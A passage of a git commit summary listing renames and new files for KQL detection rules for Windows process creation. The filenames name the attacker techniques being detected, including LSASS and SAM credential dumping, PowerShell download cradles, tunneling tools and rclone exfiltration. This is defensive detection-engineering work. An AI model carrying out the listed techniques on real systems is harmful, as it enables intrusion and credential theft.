windows/process_creation}/potential_process_injection_via_msra_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_product_class_reconnaissance_via_wmic_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_product_reconnaissance_via_wmic_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_provlaunch_exe_binary_proxy_execution_abuse.kql (100%) rename KQL/rules/{Resource Development => windows/process_creation}/potential_psexec_remote_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_rdp_session_hijacking_activity.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/potential_rdp_tunneling_via_plink.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/potential_rdp_tunneling_via_ssh.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/potential_recon_activity_using_driverquery_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/potential_recon_activity_via_nltest_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_reflectdebugger_content_execution_via_werfault_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_register_app_vbs_lolscript_abuse.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_regsvr32_commandline_flag_anomaly.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/potential_remote_desktop_tunneling.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_renamed_rundll32_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_rundll32_execution_with_dll_stored_in_ads.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_shelldispatch_dll_functionality_abuse.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/potential_shim_database_persistence_via_sdbinst_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_signing_bypass_via_windows_developer_features.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/potential_smb_relay_attack_tool_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/potential_spn_enumeration_via_setspn_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/potential_suspicious_activity_using_secedit.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_suspicious_browser_launch_from_document_reader_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_suspicious_mofcomp_execution.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/potential_suspicious_registry_file_imported_via_reg_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_suspicious_windows_feature_enabled_proccreation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_sysinternals_procdump_evasion.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql (55%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_tampering_with_security_products_via_wmic.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/potential_uac_bypass_via_sdclt_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_winapi_calls_via_commandline.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potential_windows_defender_tampering_via_wmic_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_cabinet_file_expansion.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_call_to_win32_nteventlogfile_class.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potentially_suspicious_child_process_of_clickonce_application.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_child_process_of_diskshadow_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/potentially_suspicious_child_process_of_keyscrambler_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_child_process_of_regsvr32.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potentially_suspicious_child_process_of_vscode.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potentially_suspicious_child_process_of_winrar_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_child_processes_spawned_by_conhost.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_cmd_shell_output_redirect.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/potentially_suspicious_command_targeting_teams_sensitive_files.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/potentially_suspicious_desktop_background_change_using_reg_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_dll_registered_via_odbcconf_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potentially_suspicious_electron_application_commandline.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_event_viewer_child_process.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_execution_from_parent_process_in_public_folder.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potentially_suspicious_execution_of_pdqdeployrunner.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_execution_of_regasm_regsvcs_from_uncommon_location.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_execution_of_regasm_regsvcs_with_uncommon_extension.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_googleupdate_child_process.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/potentially_suspicious_jwt_token_search_via_cli.kql (100%) create mode 100644 KQL/rules/windows/process_creation/potentially_suspicious_ntfs_symlink_behavior_modification.kql rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_office_document_executed_from_trusted_location.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_ping_copy_command_combination.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_regsvr32_http_ftp_pattern.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_regsvr32_http_ip_pattern.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_rundll32_activity.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_rundll32_exe_execution_of_udl_file.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/potentially_suspicious_usage_of_qemu.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/potentially_suspicious_webdav_lnk_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/potentially_suspicious_windows_app_activity.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/powershell_base64_encoded_frombase64string_cmdlet.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/powershell_base64_encoded_iex_cmdlet.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/powershell_base64_encoded_invoke_keyword.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/powershell_base64_encoded_mppreference_cmdlet.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/powershell_base64_encoded_reflective_assembly_load.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/powershell_base64_encoded_wmi_classes.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/powershell_defender_disable_scan_feature.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/powershell_defender_exclusion.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/powershell_download_and_execution_cradles.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/powershell_download_pattern.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/powershell_executed_from_headless_conhost_process.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/powershell_execution_with_potential_decryption_capabilities.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/powershell_get_clipboard_cmdlet_via_cli.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/powershell_get_process_lsass.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/powershell_inline_execution_from_a_file.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/powershell_sam_copy.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/powershell_script_change_permission_via_set_acl.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/powershell_script_run_in_appdata.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/powershell_set_acl_on_windows_folder.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/powershell_token_obfuscation_process_creation.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/powershell_web_access_feature_enabled_via_dism.kql (100%) create mode 100644 KQL/rules/windows/process_creation/ppl_tampering_via_werfaultsecure.kql rename KQL/rules/{Command and Control => windows/process_creation}/printbrm_zip_creation_of_extraction.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/private_keys_reconnaissance_via_commandline_tools.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/privilege_escalation_via_named_pipe_impersonation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/procdump_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/process_access_via_trolleyexpress_exclusion.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/process_creation_using_sysnative_folder.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/process_execution_from_a_potentially_suspicious_folder.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/process_launched_without_image_name.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/process_memory_dump_via_comsvcs_dll.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/process_memory_dump_via_dotnet_dump.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/process_memory_dump_via_rdrleakdiag_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/process_proxy_execution_via_squirrel_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/process_reconnaissance_via_wmic_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/proxy_execution_via_vshadow.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/proxy_execution_via_wuauclt_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/psexec_execution.kql (100%) rename KQL/rules/{Resource Development => windows/process_creation}/psexec_paexec_escalation_to_local_system.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/psexec_service_child_process_execution_as_local_system.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/psexec_service_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/pua_3proxy_execution.kql (100%) create mode 100644 KQL/rules/windows/process_creation/pua_adfind_suspicious_execution.kql rename KQL/rules/{Discovery => windows/process_creation}/pua_adidnsdump_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/pua_advanced_ip_scanner_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/pua_advanced_port_scanner_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/pua_advancedrun_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/pua_advancedrun_suspicious_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/pua_chisel_tunneling_tool_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/pua_cleanwipe_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/pua_crassus_execution.kql (100%) rename KQL/rules/{Resource Development => windows/process_creation}/pua_csexec_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/pua_defendercheck_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/pua_dit_snapshot_viewer.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/pua_fast_reverse_proxy_frp_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/pua_iox_tunneling_tool_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/pua_mouse_lock_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/pua_netcat_suspicious_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/pua_ngrok_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/pua_nimgrab_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/pua_nircmd_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/pua_nircmd_execution_as_local_system.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/pua_nmap_zenmap_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/pua_nps_tunneling_tool_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/pua_nsudo_execution.kql (100%) rename KQL/rules/{Reconnaissance => windows/process_creation}/pua_pingcastle_execution.kql (100%) rename KQL/rules/{Reconnaissance => windows/process_creation}/pua_pingcastle_execution_from_potentially_suspicious_parent.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/pua_potential_pe_metadata_tamper_using_rcedit.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/pua_process_hacker_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/pua_radmin_viewer_utility_execution.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/pua_rclone_execution.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/pua_restic_backup_tool_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/pua_runxcmd_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/pua_seatbelt_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/pua_softperfect_netscan_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/pua_suspicious_activedirectory_enumeration_via_adfind_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/pua_system_informer_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/pua_trufflehog_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/pua_webbrowserpassview_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/pua_wsudo_suspicious_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/pubprn_vbs_proxy_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/python_function_execution_security_warning_disabled_in_excel.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/python_inline_command_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/python_spawning_pretty_tty_on_windows.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/query_usage_to_exfil_data.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/quickassist_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/raccine_uninstall.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/rar_usage_with_password_and_compression_level.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/rdp_connection_allowed_via_netsh_exe.kql (100%) create mode 100644 KQL/rules/windows/process_creation/rdp_enable_or_disable_via_win32_terminalservicesetting_wmi_class.kql rename KQL/rules/{Lateral Movement => windows/process_creation}/rdp_port_forwarding_rule_added_via_netsh_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/read_contents_from_stdin_via_cmd_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/rebuild_performance_counter_values_via_lodctr_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/recon_command_output_piped_to_findstr_exe.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/recon_information_for_export_with_command_prompt.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/reg_add_suspicious_paths.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/regasm_exe_execution_without_commandline_flags_or_files.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/regedit_as_trusted_installer.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/register_app_vbs_proxy_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/registry_export_of_third_party_credentials.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/registry_manipulation_via_wmi_stdregprov.kql (100%) create mode 100644 KQL/rules/windows/process_creation/registry_modification_attempt_via_vbscript.kql rename KQL/rules/{Persistence => windows/process_creation}/registry_modification_via_regini_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/regsvr32_dll_execution_with_suspicious_file_extension.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/regsvr32_dll_execution_with_uncommon_extension.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/regsvr32_execution_from_highly_suspicious_location.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/regsvr32_execution_from_potential_suspicious_location.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_anydesk_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_anydesk_execution_from_suspicious_folder.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/remote_access_tool_anydesk_execution_with_known_revoked_signing_certificate.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_anydesk_piped_password_via_cli.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_anydesk_silent_installation.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_gotoassist_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_logmein_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_meshagent_command_execution_via_meshcentral.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_netsupport_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_potential_meshagent_execution_windows.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_renamed_meshagent_execution_windows.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/remote_access_tool_rurat_execution_from_unusual_location.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_screenconnect_execution.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/remote_access_tool_screenconnect_installation_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/remote_access_tool_screenconnect_remote_command_execution.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/remote_access_tool_screenconnect_server_web_shell_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_simple_help_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/remote_access_tool_team_viewer_session_started_on_windows_host.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_access_tool_ultraviewer_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/remote_chm_file_download_execution_via_hh_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/remote_code_execute_via_winrm_vbs.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/remote_file_download_via_desktopimgdownldr_utility.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/remote_file_download_via_findstr_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/remote_powershell_session_host_process_winrm_.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/remote_xsl_execution_via_msxsl_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/remotefxvgpudisablement_abuse_via_atomictestharnesses.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/remotely_hosted_hta_file_executed_via_mshta_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/renamed_autohotkey_exe_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/renamed_boinc_client_execution.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/renamed_browsercore_exe_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/renamed_cloudflared_exe_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/renamed_createdump_utility_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/renamed_curl_exe_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/renamed_ftp_exe_execution.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/renamed_gpg_exe_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/renamed_jusched_exe_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/renamed_mavinject_exe_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/renamed_megasync_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/renamed_microsoft_teams_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/renamed_msdt_exe_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/renamed_nircmd_exe_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/renamed_office_binary_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/renamed_pingcastle_binary_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/renamed_plink_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/renamed_procdump_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/renamed_psexec_service_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/renamed_remote_utilities_rat_rurat_execution.kql (100%) create mode 100644 KQL/rules/windows/process_creation/renamed_schtasks_execution.kql rename KQL/rules/{Resource Development => windows/process_creation}/renamed_sysinternals_debugview_execution.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/renamed_sysinternals_sdelete_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/renamed_visual_studio_code_tunnel_execution.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/renamed_vmnat_exe_execution.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/renamed_whoami_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/replace_exe_usage.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/response_file_execution_via_odbcconf_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/restrictedadminmode_registry_value_tampering_proccreation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/root_certificate_installed_from_susp_locations.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/ruby_inline_command_execution.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/run_once_task_execution_as_configured_in_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/run_powershell_script_from_ads.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/run_powershell_script_from_redirected_input_stream.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/rundll32_execution_with_uncommon_dll_extension.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/rundll32_execution_without_commandline_parameters.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/rundll32_execution_without_parameters.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/rundll32_installscreensaver_execution.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/rundll32_registered_com_objects.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/rundll32_spawned_via_explorer_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/rundll32_spawning_explorer.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/rundll32_unc_path_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/runmru_registry_key_deletion.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/safeboot_registry_key_deleted_via_reg_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/scheduled_task_creation_masquerading_as_system_processes.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/scheduled_task_creation_via_schtasks_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/scheduled_task_executing_encoded_payload_from_registry.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/scheduled_task_executing_payload_from_registry.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/schtasks_creation_or_modification_with_system_privileges.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/schtasks_from_suspicious_folders.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/screen_capture_activity_via_psr_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/script_event_consumer_spawning_process.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/script_interpreter_execution_from_suspicious_folder.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/scripting_commandline_process_spawned_regsvr32.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/sdclt_child_processes.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/sdiagnhost_calling_suspicious_child_process.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/security_event_logging_disabled_via_minint_registry_key_process.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/security_privileges_enumeration_via_whoami_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/security_service_disabled_via_reg_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/security_tools_keyword_lookup_via_findstr_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/sensitive_file_access_via_volume_shadow_copy_backup.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/sensitive_file_dump_via_wbadmin_exe.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/service_dacl_abuse_to_hide_services_via_sc_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/service_reconnaissance_via_wmic_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/service_registry_key_deleted_via_reg_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/service_security_descriptor_tampering_via_sc_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/service_started_stopped_via_wmic_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/service_startuptype_change_via_powershell_set_service.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/service_startuptype_change_via_sc_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/set_suspicious_files_as_system_files_using_attrib_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/setup16_exe_execution_with_custom_lst_file.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/shadow_copies_creation_using_operating_systems_utilities.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/shadow_copies_deletion_using_operating_systems_utilities.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/share_and_session_enumeration_using_net_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/shell32_dll_execution_in_suspicious_directory.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/shell_process_spawned_by_java_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/shimcache_flush.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/sql_client_tools_powershell_session_detection.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/sqlite_chromium_profile_data_db_access.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/sqlite_firefox_profile_data_db_access.kql (100%) rename 